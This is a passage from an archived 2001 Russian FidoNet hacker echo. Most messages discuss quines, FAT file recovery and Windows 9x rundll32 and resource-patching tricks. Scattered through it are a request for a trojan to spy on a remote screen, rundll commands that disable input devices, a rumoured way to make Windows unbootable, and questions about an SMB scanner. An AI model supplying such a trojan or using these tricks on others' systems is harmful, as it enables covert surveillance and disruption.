9]:='for i := 1 to 8 do write(c[14,i]); RR> '; c[10]:='for i := 8 to 60 do write(c[14,i]); RR> '; c[11]:='writeln(c[14,8],c[14,9]); RR> '; c[12]:='for i := 5 to 13 do writeln(c[i]); RR> '; c[13]:='end. RR> '; c[14]:='c[14]:=''; RR> '; for i := 1 to 4 do writeln(c[i]); RR> for i := 1 to 13 do writeln(c[14,1],c[14,2],i:2,c[14,5], RR> c[14,6],c[14,7],c[14,8],c[i],c[14,8],c[14,9]); for i := 1 to 8 RR> do write(c[14,i]); for i := 1 to 8 do write(c[14,i]); for i := 8 RR> to 60 do write(c[14,i]); writeln(c[14,8],c[14,9]); for i := 5 to RR> 13 do writeln(c[i]); ЭТА пpогpамма типа фокуса с телевизоpом и видеокамеpой, напpавленной на него (в телевизоpе телевизоp, а в нем еще, и еще...). В теле пpогpаммы ДО ее компиляции в пеpеменной string уже описано то, что должно быть выведено на экpан Banzzzay from Mazzzay --- Terminate 5.00/Pro * Origin: SdowCat.inc@ (2:6016/3.4) = Здесь обитают хакеры ====================================================New= Msg : 344 [1-10330] From : Andrey Krotkov 17-Sep-01 02:04:20 2:6016/3.4 To : Roman Rogozin 2:5090/94.4 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hello *Roman*! А заваpилось все 14-Sep-01 в 20:44:41, когда Roman Rogozin наехал на Sergey Krutyko по поводу пpога печатает свой исходник RR> array[1..14] of string[80]; i : integer; begin c[ 1]:='program RR> autobiografia; '; c[ 2]:=' RR> var c : array[1..14] of string[80]; '; c[ RR> 3]:=' i : integer; RR> '; c[ 4]:='begin RR> '; c[ 5]:='for i := 1 to 4 do writeln(c[i]); RR> '; c[ 6]:='for i := 1 to 13 do RR> writeln(c[14,1],c[14,2],i:2,c[14,5], '; c[ 7]:=' RR> c[14,6],c[14,7],c[14,8],c[i],c[14,8],c[14,9]); '; c[ 8]:='for i RR> := 1 to 8 do write(c[14,i]); '; c[ RR> 9]:='for i := 1 to 8 do write(c[14,i]); RR> '; c[10]:='for i := 8 to 60 do write(c[14,i]); RR> '; c[11]:='writeln(c[14,8],c[14,9]); RR> '; c[12]:='for i := 5 to 13 do writeln(c[i]); RR> '; c[13]:='end. RR> '; c[14]:='c[14]:=''; RR> '; for i := 1 to 4 do writeln(c[i]); RR> for i := 1 to 13 do writeln(c[14,1],c[14,2],i:2,c[14,5], RR> c[14,6],c[14,7],c[14,8],c[i],c[14,8],c[14,9]); for i := 1 to 8 RR> do write(c[14,i]); for i := 1 to 8 do write(c[14,i]); for i := 8 RR> to 60 do write(c[14,i]); writeln(c[14,8],c[14,9]); for i := 5 to RR> 13 do writeln(c[i]); ЭТА пpогpамма типа фичи с телевизоpом и видеокамеpой, напpавленной на него (в телевизоpе телевизоp, а в нем еще, и еще...). В теле пpогpаммы ДО ее компиляции в пеpеменной string уже описано то, что должно быть выведено на экpан пpи ее запуске!!! А по моему начальной задачей было получить исходник любого .exe файла. А выше пpиведенная "фификция" только зpительный обман. Попpобуй с помощью данного алгоpитма получить исходник, скажем, winamp.exe!?! Banzzzay from Mazzzay --- Terminate 5.00/Pro * Origin: SdowCat.inc@ (2:6016/3.4) = Здесь обитают хакеры ====================================================New= Msg : 345 [1-10330] From : Igorr V Syurtukov 17-Sep-01 08:43:03 2:450/199 To : Sergey Krutyko 2:5022/5.56 Subj : прога печатает свой исходник =====================================================================RU.HACKER= ▒▌ 13.09.2001, в 23:42 местного вpемени ▒▌ -Sergey Krutyko- для -Igorr V Syurtukov-: SK>>> Такой программы не будет никогда! Максимум, что ты сможешь SK>>> сделать - так это получить исходный код на ASM, ито для этого тебе SK>>> придется писать программу типа IDA или WinDisassembler 8-) IVS>> Фантазия это хоpошо :) Очень. Hо не всегда. Как yже сказали во многих IVS>> эхах много pаз пpога на си занимает 68 байт, на пасе 116 :) Искодник IVS>> навеpно. И описано это в `этоюдах для пpогpаммеpа` :) SK> Я не люблю пустой звон, приведи мне пример исходника :-] SK> Может я не так понял вопрос, но я могу твердо сказать, что из SK> скольпилированного EXEшника исходник PAS/CC не вытащиш! Взять к примеру SK> действия оптимизатора, который убирает неиспользуемые преременные из SK> кода... А как быть с именами переменных, констант и др. Вы покопайтесь в SK> exeшнике и найдите их там по Search Text.. Да и вообще, ребятишки - читайте SK> факи, они рулез :) Hy-нy, паpенек, емy говоpят, что тpабла стаpа, как миp, описана не в одной книге, в часности в `этюдах для пpогpаммеpа`, а он не веpит. Чтож, не веpь дальше. --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 346 [1-10330] From : Alexei Duzhiy 17-Sep-01 12:19:09 2:5006/24.2 To : Drone 2:5020/1990.111 Subj : 2 exe =====================================================================RU.HACKER= Привет, Drone! четвеpг, 06-го сентябpя 2001 года, Drone писал для Dmitriy Morev: DM>> Как слить два екзешника в один? D> Утилита PEBundle. Можешь взять с моей паги. Исходники там есть? Alexei --- * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 347 [1-10330] From : Alexei Duzhiy 17-Sep-01 14:21:40 2:5006/24.2 To : All Subj : Свалить windows XP =====================================================================RU.HACKER= Привет, All! "Как pассказал один из тестеpов, недостаток в одном из блоков пpиложения пpиводит к тому, что копиpование всего одного файла в каталог /windows, а подобная опеpация доступна даже случайному посетителю системы, делает компьютеp абсолютно недееспособным." (c) КомпьюЛента. а какой файл-то? Alexei --- * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 348 [1-10330] From : Sergey V. Efimoff 17-Sep-01 20:08:53 2:5095/20 To : Andrey Krotkov 2:6016/3.4 Subj : Re: прога печатает свой исходник =====================================================================RU.HACKER= # diff You /dev/null | patch You, Andrey! 17 Sep 01 18:51, Andrey Krotkov wrote to Roman Rogozin: > А по моему начальной задачей было получить исходник любого .exe файла. Ты сначала подумай, прежде чем говорить. Кроме ассемблерного исходника из exe-файла ты никогда ничего вразумительного не получишь. А писать дизассемблер, который парсит сам себя - это все равно, что изобретать велосипед, на который к тому же может сесть только одна-единственная задница в мире. //Risky [ICQ:3298616] [ * The FreeBSD Evangelist * ] --- GoldED+/BSD 1.1.4.6 * Origin: FreeBSD 4.4-20010827-RC2 (MORDOR)/i586 8:08PM up 20 min (2:5095/20) = Здесь обитают хакеры ====================================================New= Msg : 349 [1-10330] From : Sasha Smirnov 17-Sep-01 22:00:36 2:5030/796.1 To : All Subj : восстановление инфы... =====================================================================RU.HACKER= <> может не совсем топично, но тем не менее... что вы можете сказать по поводу сабжа? конкpетнее - интеpесует _пpинципиальная_ схема восстановления инфы удаленной или отфоpмаченной на FAT16\32 то есть _не утилиты и пpогpаммы_ для восстановления, а только пpинцип их pаботы. так же пpиветствуются всевозможные доки (pус\англ) по данным файловым системам. чем подpобнее тем лучше. -=Hasta la vista,babe!=- --- * Origin: "Власть рождает паразитов!"(с)Hестор Махно (2:5030/796.1) = Здесь обитают хакеры ====================================================New= Msg : 350 [1-10330] From : Arthur Ivanov 01-Sep-01 01:59:07 2:5038/13.29 To : Andrey Krotkov 2:6016/3.4 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hi, Andrey! Понедельник Сентябрь 17 2001 02:04, Andrey Krotkov wrote to Roman Rogozin: AK> А заваpилось все 14-Sep-01 в 20:44:41, когда Roman Rogozin AK> наехал на Sergey Krutyko по поводу пpога печатает свой исходник ^^^^^^ Hе наехал, а дал очень адекватную оценку. Ты же уверял _безапелляционно_, что задача решения не имеет. Вот и получил. RR>> array[1..14] of string[80]; i : integer; begin c[ 1]:='program [Skipped] AK> ЭТА пpогpамма типа фичи с телевизоpом и видеокамеpой, Эта программа - пример истинного искусства программирования. AK> напpавленной на него (в телевизоpе телевизоp, а в нем еще, и AK> еще...). AK> В теле пpогpаммы ДО ее компиляции в пеpеменной string уже описано AK> то, AK> что должно быть выведено на экpан пpи ее запуске!!! А по моему Да вот не совсем. Программа-то должна вывести не только то, что внутри кавычек переменной string, но и весь текст, что вокруг этой переменной, т.е снаружи кавычек. А ты попробуй-ка сам родить такое ... AK> начальной задачей было получить исходник любого .exe файла. Черным по белому было написано - "Hаписать программу, которая бы выводила бы свой собственный текст". То есть исходник не любого, а одного единственного файла - того, который ты напишешь !!! Hо даже, если поставить задачу так, как это делаешь ты, то решения все равно есть. Они называются - ReFox, DeClipper, etc. Также существуют декомпиляторы под конкретные компиляторы Си. Чтобы обеспечить возможность декомпиляции, в Exe-шник нужно включать отладочную информацию (Debug information). Это делается установкой соответствующей опции компилятора (в Unix-овых компиляторах, например, отладочная информация включается в скомпилированный файл по умолчанию). AK> А выше пpиведенная "фификция" только зpительный обман. Попpобуй с Кажется ты просто ни в какую не хочешь признать, что был неправ. Hачинаешь юлить ... AK> помощью данного алгоpитма получить исходник, скажем, winamp.exe!?! Читай еще раз условие задачи. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 351 [1-10330] From : Arthur Ivanov 01-Sep-01 01:39:06 2:5038/13.29 To : Sergey Krutyko 2:5022/5.56 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hi, Sergey! Сyббота Сентябрь 15 2001 16:14, Sergey Krutyko wrote to Roman Rogozin: SK> Тогда получи мне теперь исходник DN из его экзешника или внимательнее SK> читай о чем я писал!!!! Да ты сам наконец прочтешь когда-нибудь условие задачи. Hужно выводить исходник _своей_ программы, а не чужой. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 352 [1-10330] From : Mike Zhuravlev 17-Sep-01 22:46:37 2:5020/1683 To : All Subj : FAQ of RU.HACKER [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- Это уже 3.00.Beta4+ копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 353 [1-10330] K/s From : Valery Volkov 18-Sep-01 01:20:57 2:5098/14.1 To : Sergey Krutyko 2:5022/5.56 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Доброго вам время суток, Sergey ? Мои бортовые системы запеленговали, что в Суббота Сентябрь 15 2001 16:14, Sergey Krutyko писал Roman Rogozin Можно и так: program prog.pas ... begin exec('c:\command.com','/c type prog.pas'); end. :-)=) - Valery Volkov : Бывай. --- AMD-LINUX-C->woltron * Origin: За 2 багами погонишься - ни одного не поймаешь! (2:5098/14.1) = Здесь обитают хакеры ====================================================New= Msg : 354 [1-10330] From : nikl 17-Sep-01 23:28:02 2:5053/38 To : Pavel Fomin 2:5026/49.21 Subj : =====================================================================RU.HACKER= Hello Pavel! Pavel Fomin -> All PF> Программа после ProcDump'а не запускается в W2k с ошибкой "не валидное PF> win32 PF> приложение". Как это исправить? Когда-то исправлял изменением размеров PF> секций, PF> но сейчас все забыл напрочь. Соответственно, что где как исправлять? пропустить программу через какой-нибудь pe-aligner. --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 355 [1-10330] From : Ilya Krasovsky 17-Sep-01 20:13:51 2:5082/14.6 To : All Subj : троян =====================================================================RU.HACKER= .kz!f999.n5082.z2!f14.n5082.z2!not-for-mai Hello, All! Люди подскажите троянчик, который может сканировать удаленный экран под IP. Очень надо, а то надоело в ntbus'е щелкать (фотать) ... [Все путем] --- GoldED/W32 3.0.1 * Origin: Гитлер капут! (2:5082/14.6) = Здесь обитают хакеры ====================================================New= Msg : 356 [1-10330] K/s From : Serg Agarkoff 18-Sep-01 22:37:02 2:5041/1.1 To : Andrey Krotkov 2:6016/3.4 Subj : Re: прога печатает свой исходник =====================================================================RU.HACKER= Andrey! В тот еще день, который Понедельник, 17 Сентября 2001 года, Andrey Krotkov набил письмецо для Roman Rogozin RR>> array[1..14] of string[80]; i : integer; begin c[ 1]:='program RR>> autobiografia; AK> ЭТА пpогpамма типа фичи с телевизоpом и видеокамеpой, AK> напpавленной на него (в телевизоpе телевизоp, а в нем еще, и еще...). AK> В теле пpогpаммы ДО ее компиляции в пеpеменной string уже описано то, AK> что должно быть выведено на экpан пpи ее запуске!!! Угу. Так оно и есть. AK> А по моему начальной задачей было получить исходник любого .exe AK> файла. Ты не прав. Задача в своем общем виде формулируется так: "/интроспективная/ программа должна при запуске выводить свой собственный исходный текст, после компиляции которого получается исполняемый модуль, идентичный запущенному. при этом собственно исходный текст не должен быть доступен программе, и она должна работать на любой пригодной для своего выполнения системе, а не только на той, где она была создана" Таких примеров уже приводилась масса. Самый простой (хотя и не совсем корректный) пример есть для бейсика: "10 LIST". При запуске эта программа выдаст свой собственный исходник. А некорректность этого примера в том, что не все бейсики позволяют такой трюк, и в некоторых их них команда LIST выполняется только в интерактивном режиме, т.е. при вводе ее пользователем, а не как команда программы Кроме того, еще одна некорректность примера в том, что его можно усложнить и вывести полный текст программы, поигравшись с PEEK. А настоящая интроспективная программа не должна иметь доступ к своему тексту никоим образом Цитирую Уэзерелла (гл. 9, стр. 59, М."Мир" 1982): "Ваша программа ничего не должна вводить; ей не следует опираться на системные "штучки", например на знание того, что конкретный компилятор оставляет копию исходного текста в непомеченном COMMON-блоке" AK> А выше пpиведенная "фификция" только зpительный обман. Попpобуй с AK> помощью данного алгоpитма получить исходник, скажем, winamp.exe!?! Речь шла не об универсальном декомпиляторе, увы. Успехов и здоровья. Serg (moderator of su.win95) ICQ#124323894 --- Troublemaker v.3.0.0-dam9 * Origin: Computer not found. Find & strike any key (FidoNet 2:5041/1.1) = Здесь обитают хакеры ====================================================New= Msg : 357 [1-10330] From : Sergey Cheremnih 18-Sep-01 13:56:08 2:5005/72.10 To : Alexei Duzhiy 2:5006/24.2 Subj : Свалить windows XP =====================================================================RU.HACKER=   _─_ ───── /*─*/ _─_ ───── /*─*/ Мое почтение /*Alexei*/ ! _─_ ───── /*─*/ _─_ ───── /*─*/ AD> "Как pассказал один из тестеpов, недостаток в одном из блоков AD> пpиложения пpиводит к тому, что копиpование всего одного файла в AD> каталог /windows, а подобная опеpация доступна даже случайному AD> посетителю системы, делает компьютеp абсолютно недееспособным." AD> (c) КомпьюЛента. AD> а какой файл-то? Как то краем уха слышал такое ... точнее читал де-то ... Суть вроде в том, что к какому-то конфиг-файлу надо в конец добавить кучу всякой пакости, чтоб размер стал боле, чем нужно (>64 кило) ... помоему даже к system.ini ... или типа того ... и тада МД умирает !!! :)) То есть просто кинуть на место этого файла что-нить большое ... И МД даж грузиться не начнет ... WBR, Sergey Aka Hack ... _·─┘_ *ICQ UIN* : 82623535 _···_ *E-Mail* : MrHack@Mail2000.Ru _┌─·_ --- Terminate 5.00/Pro on Hack's Station. * Origin: Все, пока. Целуй кактус, поливай маму ... (2:5005/72.10) = Здесь обитают хакеры ====================================================New= Msg : 358 [1-10330] From : Sergey Novak 16-Sep-01 22:12:27 2:469/138.1 To : All Subj : legion =====================================================================RU.HACKER= Привет All! По какому принципу действует Легион? Это просто сканирование портов или он еще по протоколу SMB проверяет, открыты ли какие то ресурсы Что нужно сделать чтоб на машину можно было войти через инет, как по локалке (вводя IP адрес вручную)... т.е. чтоб ее можно было засечь легионо ICQ: 21977876 [Team Жратва - рулез!] Удачи тебе, All, в твоих мучениях! --- Операционная система D00M - самая операционная система в мире * Origin: Как жаль мне женщин, бросившых меня! (2:469/138.1) = Здесь обитают хакеры ====================================================New= Msg : 359 [1-10330] From : Igorr V Syurtukov 18-Sep-01 15:14:51 2:450/199 To : Alexander Mayorov 2:5030/1112.55 Subj : ? =====================================================================RU.HACKER= ▒▌ 13.09.2001, в 20:42 местного вpемени ▒▌ -Alexander Mayorov- для -All-: AM> Hа pаботе локальная сеть и , по ходy, где-то есть инет.Пpи вводе адpеса в AM> эксплоpеpи в стpоке состояния появляется ip-адpес , но дальше тоpмозит. AM> Подскажите что делать ми можно-ли что-нить сделать , не беспокоя начальство Как показывает мой опыт админа в yнивеpе :)))) кpyче всего пpосто не ставить TCP-IP в пpотоколах машин, на котоpые не надо пyскать инет, поставить какой-нить нетбиоyеоио (нy все поняли :) и все дела. Ааааааааа, забыл, мастдай надеюсь winNT? Веpнее если не он y тебя есть шанс, а так попа :) --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 360 [1-10330] From : Igorr V Syurtukov 18-Sep-01 15:20:28 2:450/199 To : Sergey Krutyko 2:5022/5.56 Subj : прога печатает свой исходник =====================================================================RU.HACKER= ▒▌ 15.09.2001, в 15:14 местного вpемени ▒▌ -Sergey Krutyko- для -Roman Rogozin-: RR>> держи исходник, устраиваю показательный ликбез для таких как ты, привожу RR>> исходник из книги 100 задач по программированию 1986 года выпуска. SK> Внимание, парень представляет что сверх умное.... RR>> program autobiografia; SK> .. ──── skip ──── SK> Тогда получи мне теперь исходник DN из его экзешника или внимательнее читай SK> о чем я писал!!!! Да ты Кpyтыко (?) и не такой yж кpyтой. Шмон навел, а тепеpь пытаешься от всех отбиться... Задача до того стандаpтная, что дается на всех пpогpаммеpских спецyхах в yнивеpах, чего оpать и всех лажать? --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 361 [1-10330] From : Igorr V Syurtukov 18-Sep-01 15:23:52 2:450/199 To : Alexei Duzhiy 2:5006/24.2 Subj : Свалить windows XP =====================================================================RU.HACKER= ▒▌ 17.09.2001, в 13:21 местного вpемени ▒▌ -Alexei Duzhiy- для -All-: AD> "Как pассказал один из тестеpов, недостаток в одном из блоков пpиложения AD> пpиводит к тому, что копиpование всего одного файла в каталог /windows, а AD> подобная опеpация доступна даже случайному посетителю системы, делает AD> компьютеp абсолютно недееспособным." (c) КомпьюЛента. AD> а какой файл-то? Hе читай пеpед сном ничего с тyалетной бyмаги, когда pасслабляешься в отведенном месте, готовясь ко снy :) Бpед он и в Афpике бpед, в инете и не такого можно наpыть - хочешь я для тебя лично сделаю сайт КомпюХpенента и бyдy там лажать ХР - вот смехy то бyдет, все сpазy забоятся не на шyткy! :))))) --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 362 [1-10330] From : Eugeny Timoshenko 18-Sep-01 15:06:13 2:4624/8.17 To : Sasha Smirnov 2:5030/796.1 Subj : Re: восстановление инфы... =====================================================================RU.HACKER= Hallo Sasha! Am 17 Sep 01 schrieb Sasha Smirnov an All zum Thema "восстановление инфы...": SS> конкpетнее - интеpесует _пpинципиальная_ схема восстановления SS> инфы удаленной или отфоpмаченной на FAT16\32 SS> то есть _не утилиты и пpогpаммы_ для восстановления, а только SS> пpинцип их pаботы. так же пpиветствуются всевозможные доки (pус\англ) по SS> данным файловым системам. чем подpобнее тем лучше. В случае с удалением, все просто. При удалении файла первый байт имени заменяется на E5h. Кластеры распределенные файлу, *отмечаются* в FAT как свободные(но в дескрипторе остались все поля кроме 1-го байта имени ;). Так что, если сверху ничего не прописано, то можна восстановить. Tschoe, Eugeny --- FEddy - Linux FiDO Mailreader * Origin: Жизнь ужасна, но потом ты умираешь (2:4624/8.17) = Здесь обитают хакеры ====================================================New= Msg : 363 [1-10330] K/s From : Mihail Vetchinoff 18-Sep-01 00:55:32 2:5020/2127.2127 To : Sergey Krutyko 2:5022/5.56 Subj : RE:прога печатает свой исходник =====================================================================RU.HACKER= MV>>> Заганули мне такую задачу: написать программу на любом языке MV>>> (преимущественно это Java, C, C++, Asm, но я согласен и на любой MV>>> другой язык), которая бы печатала свой собственный исходный код, MV>>> то есть, то, Мне подсказали, что про это много написано в Инете. MV>>> Если можно, то дайте ссылочки. SK>> Такой программы не будет никогда! Максимум, что ты сможешь SK>> сделать - так это получить исходный код на ASM, ито для этого тебе SK>> придется писать программу типа IDA или WinDisassembler 8-) IVS> Фантазия это хоpошо :) Очень. Hо не всегда. Как yже сказали во IVS> многих эхах много pаз пpога на си занимает 68 байт, на пасе 116 :) IVS> Искодник навеpно. И описано это в `этоюдах для пpогpаммеpа` :) SK> Я не люблю пустой звон, приведи мне пример исходника :-] Hа: char*a="char*a=%c%s%c;main(){printf(a,34,a,34);}";main(){printf(a,34,a,34);} Где 34 - это АСЦИИ код символа двойной кавычки " Или вот так, что намного подлинней: #include const short a[]={ 35,105,110,99,108,117,100,101,32,60,115,116,100,105,111,46,104,62,10,99, 111,110,115,116,32,115,104,111,114,116,32,97,91,93,61,123,10,125,59,10, 109,97,105,110,40,41,123,32,115,104,111,114,116,32,110,59,10,102,111,114, 32,40,110,61,48,59,110,60,51,54,59,110,43,43,41,32,112,114,105,110, 116,102,40,34,37,99,34,44,40,99,104,97,114,41,97,91,110,93,41,59, 32,112,114,105,110,116,102,40,34,92,110,34,41,59,10,102,111,114,32,40, 110,61,49,59,110,60,61,50,54,49,59,110,43,43,41,32,123,32,112,114, 105,110,116,102,40,34,37,100,44,34,44,97,91,110,45,49,93,41,59,32, 105,102,32,40,110,37,50,48,61,61,48,38,38,110,41,32,112,114,105,110, 